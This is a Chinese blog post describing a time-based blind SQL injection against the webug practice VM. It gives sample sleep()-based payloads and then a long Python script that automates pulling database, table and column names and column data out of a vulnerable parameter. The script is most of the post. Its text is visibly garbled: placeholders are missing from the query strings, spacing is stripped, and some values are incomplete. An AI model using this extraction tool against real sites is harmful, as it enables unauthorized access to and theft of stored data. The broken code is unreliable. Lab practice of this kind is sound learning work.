用Python自定义打造的时间盲注脚本

推荐一个自带很多web的入门练习虚拟机--webug,网上有资源,如果嫌大可以找Johnson。

最近johnson在测试webug上的一个时间盲注的时候,就想着自己写一个脚本。

访问页面是这样的:

提示说传一个type的参数进行

参数变了,页面也会跟着变化,既然是时间注入,就自己手动测试一下。

Payload1:

192.168.1.107/pentest/test/time/?type=1 and if(substr(database(),1,1)='a',sleep(3),1)

页面直接刷新了,最后不断的尝试,发现当payload为:

192.168.1.107/pentest/test/time/?type=1 and if(substr(database(),1,1)='p',sleep(3),1)的时候,页面会暂停3秒,所以数据库的第一个字母是p,为了锻炼自己,手动写了一个简单的,冗余非常大的脚本。

#!/usr/bin/env python

# encoding: utf-8

"""

@version: V1.0

@author: johnson

@file: bool_time.py

@time: 1/2/18 4:24 PM

"""

importrequests

importtime

s =3#设置延时的秒数

#主函数

defmain():

url =raw_input("Please input url:")#输入需要测试的地址

# # url = "http://192.168.1.105/pentest/test/time/?type=1"

payloads ="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM0123456789@_.}{,"

print"start get length..."

length = getDatabaseLength(url)#获取数据库的长度

print"start database sql injection..."

database = getDatabaseName(url,length,payloads)#获取数据库的名字

print"the current database is "+ database

print"start get table count..."

table_count = getTableCount(url,database)#获取表的数量

print"the database %s's table count is %d"% (database,table_count)

print"start get table length..."

# table_count = 4

table_length = (getTableLength(url,table_count,database))#获取表的长度

printtable_length

print"start table sql injection..."

tables = getTableName(url,payloads,database,table_length)#获取表名

print"table name is "

printName(tables)

break_while ='Y'

#循环查看表的结构

whilebreak_while =='Y'orbreak_while =='y':

table_name =raw_input("Please input table name:")

columns = getColumnName(url,table_name,database,payloads)#获取指定表的列名

print"column name is "

printName(columns)

break_while =raw_input("Do you want to inject other table name?(Y/n)")

ifbreak_whileisNone:

break_while ='Y'

ifbreak_while =='n'orbreak_while =='N':

get_data =raw_input("Do you want to test other column?(Y/n)")

ifget_data =='Y'orget_data =='y':

column_name =raw_input("Please input column name:")

getDatas(url,payloads,table_name,column_name)#获取指定表指定列的数据

break

else:

break_while ='N'

#获取当前数据库长度

defgetDatabaseLength(url):

foriinrange(1,50):

start_time = time.time()

url1 =" and if(length(database())=, sleep(),1)%23".format(url=url,i=i,s=s)

#print url1

requests.get(url1)

iftime.time() - start_time > s-1:

print"the length is "+str(i)

returni

#获取当前数据库的名字

defgetDatabaseName(url,length,payloads):

database =""

fordinrange(1,length +1):

forpayloadinpayloads:

start_time = time.time()

url2 =" and if(substr(database(), ,1)='', sleep(),1)%23".format(url=url,d=d,payload=payload,s=s)

requests.get(url2)

iftime.time() - start_time > s-1:

database += payload

printdatabase

break

returndatabase

#获取指定数据库的表数量

defgetTableCount(url,database):

table_count =

forcountinrange(1,50):

start_time_of_table_count = time.time()

url_get_count =" and if(substr((select count(*) from information_schema.tables where table_schema=''),1,1) = , sleep(),1)%23".format(url= url,database= database,s= s,count= count)

requests.get(url_get_count)

#print urlGetCount

iftime.time() - start_time_of_table_count > s-1:

table_count = count

break

returntable_count

#获取指定数据库的所有表长度

defgetTableLength(url,table_count,database):

table_length = []

forcountinrange(,table_count):

foriinrange(1,21):

start_time_of_table_length = time.time()

url3 =" and if(substr((select length(table_name) from information_schema.tables where table_schema='' limit ,1),1,1) = , sleep(),1)%23".format(url= url,database= database,count= count,i= i,s= s)

#print url3

requests.get(url3)

iftime.time() - start_time_of_table_length > s-1:

table_length.append(i)

print"the table '%d' length is %s"% (count+1,i)

break

returntable_length

#获取表名字

defgetTableName(url,payloads,database,table_length):

tables = []

foriinrange(,len(table_length)):

table =""

fordinrange(1,table_length[i]+1):

forpayloadinpayloads:

start_time_of_table_name = time.time()

url4 =" and if(substr((select table_name from information_schema.tables where table_schema='' limit ,1),'',1) = '', sleep(),1)".format(url= url,i= i,d= d,payload= payload,database= database,s= s)

requests.get(url4)

iftime.time() - start_time_of_table_name > s-1:

table += payload

printtable

break

tables.append(table)

returntables

#输出名字

defprintName(result):

foriinrange(,len(result)):

printresult[i]

#获取指定表的列的数量

defgetColumnCount(url,table_name,database):

column_count =

forcountinrange(1,50):

start_time_of_column_count = time.time()

url_get_column_count =" and if(substr((select count(*) from information_schema.columns where table_schema='' and table_name=''),1,1) = , sleep(),1)%23".format(url= url,database= database,s= s,table_name=table_name,count= count)

requests.get(url_get_column_count)

# print urlGetColumnCount

iftime.time() - start_time_of_column_count > s-1:

column_count = count

break

returncolumn_count

#获取指定表列的长度

defgetColumnLen(url,column_count,database,table_name):

column_length = []

forcountinrange(,column_count):

foriinrange(1,21):

start_time = time.time()

get_url=" and if(substr((select length(column_name) from information_schema.columns where table_schema='' and table_name='' limit ,1),1,1) = , sleep(),1)%23".format(url= url,database= database,table_name=table_name,count= count,i= i,s= s)

#print getURL

requests.get(get_url)

iftime.time() - start_time > s-1:

column_length.append(i)

print"the column '%d' length is %s"% (count+1,i)

break

returncolumn_length

#获取列名

defgetColumnName(url,table_name,database,payloads):

column_names = []

column_count = getColumnCount(url,table_name,database)

printcolumn_count

column_len = getColumnLen(url,column_count,database,table_name)

forkinrange(,len(column_len)):

column =""

fordinrange(1,column_len[k]+1):

forpayloadinpayloads:

start_time = time.time()

url4 =" and if(substr((select column_name from information_schema.columns where table_schema='' and table_name='' limit ,1),'',1) = '', sleep(),1)%23".format(

url=url,database=database,table_name=table_name,i=k,d=d,payload=payload,s=s)

requests.get(url4)

iftime.time() - start_time > s -1:

column += payload

printcolumn

break

column_names.append(column)

returncolumn_names

#获取指定列的数据数量

defgetDataCount(url,table_name,column_name):

data_count =

forcountinrange(1,50):

start_time = time.time()

url_get_data_count =" and if(substr((select count(*) from ),1,1) = , sleep(),1)%23".format(

url=url,column_name=column_name,s=s,table_name=table_name,count=count)

requests.get(url_get_data_count)

# print urlGetColumnCount

iftime.time() - start_time > s -1:

data_count = count

break

returndata_count

#获取指定列的数据长度

defgetDataLen(url,table_name,column_name,id):

data_len =

forlinrange(,100000):

start_time_of_get_data_len = time.time()

get_data_len_url =" and if(substr((select length() from limit ,1)=,1,1), sleep(),1)%23".format(s= s,l= l,id= id,table_name= table_name,column_name= column_name,url= url)

requests.get(get_data_len_url)

# print get_data_len_url

iftime.time() - start_time_of_get_data_len > s -1:

print"the data '%d' length is %d"% (id,l)

data_len = l

break

returndata_len

#获取数据

defgetDatas(url,payloads,table_name,column_name):

datas = []

data_count = getDataCount(url,table_name,column_name)

print"the data's count is %d"% (data_count)

foriinrange(,data_count):

data =""

data_len = getDataLen(url,table_name,column_name,i)

print"the data's len is %d"% (data_len)

forjinrange(,data_len +1):

forpayloadinpayloads:

start_time = time.time()

url_of_get_datas =" and if(substr((select from limit ,1),,1)='', sleep(),1)%23".format(url=url,column_name=column_name,table_name=table_name,payload=payload,j=j,s=s,i=i)

requests.get(url_of_get_datas)

iftime.time() - start_time > s -1:

data += payload

printdata

break

datas.append(data)

if__name__ =='__main__':

main()

最后的结果就是:

代码写的比较随意,只是希望多交流学习

本文来自企鹅号 - 计科信安媒体

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏Golang语言社区

GO语言文件的创建与打开实例分析

文件操作是个很重要的话题,使用也非常频繁,熟悉如何操作文件是必不可少的。Golang 对文件的支持是在 os package 里,具体操作都封装在 type F...

37250
来自专栏黑泽君的专栏

day56_BOS项目_08

  注意1:权限数据属于比较特殊的数据,系统在上线之后,必须先把权限数据给它初始化到数据库中去,然后这个系统才可以跑起来。如果不初始化权限数据的话,那么登录上系...

12020
来自专栏破晓之歌

vue中axios处理http发送请求的示例(Post和get)

axios中文文档:https://github.com/mzabriskie/axios#using-applicationx-www-form-urlenc...

29530
来自专栏happyJared

Elasticsearch 6.3.2版本踩填坑指南

  前端时间利用ES开发一个"附近地理位置+其它信息"查询搜索的功能(据了解,Redis和PostgreSQL也能实现同样的功能),实践中遇到了不少的问题,所以...

99720
来自专栏NetCore

保护连接字符串

保护连接字符串 摘自MSDN 保护对数据源的访问是安全应用程序最重要的目标之一。为了帮助限制对数据源的访问,必须保护连接信息(例如用户标识、密码和数据源名称)的...

22350
来自专栏Golang语言社区

GO语言文件的创建与打开实例分析

文件操作是个很重要的话题,使用也非常频繁,熟悉如何操作文件是必不可少的。Golang 对文件的支持是在 os package 里,具体操作都封装在 type F...

31040
来自专栏蓝天

Linux下共享库(SO)有关的几个环境变量

Linux支持共享库已经有悠久的历史了,不再是什么新概念了。大家都知道如何编译、连接以及动态加载(dlopen/dlsym/dlclose) 共享库。但是,...

17910
来自专栏北京马哥教育

ls 命令还能这么玩?看一下这 20 个实用范例

21240
来自专栏C/C++基础

MySQL出现:ERROR 3 (HY000): Error writing file '/tmp/MYbEd05t' (Errcode: 28)

在执行一个有1000万条记录的MySQL查询语句时,出现了上面的错误。百度折腾了很长时间,终于解决,特此记录。

33030
来自专栏QQ音乐技术团队的专栏

ContentProvider简介

(一) 基础知识 Content Provider属于Android四大组件之一,相比较而言,它更侧重于共享数据。Android的数据存储方式有以下几种:...

35360

扫码关注云+社区

领取腾讯云代金券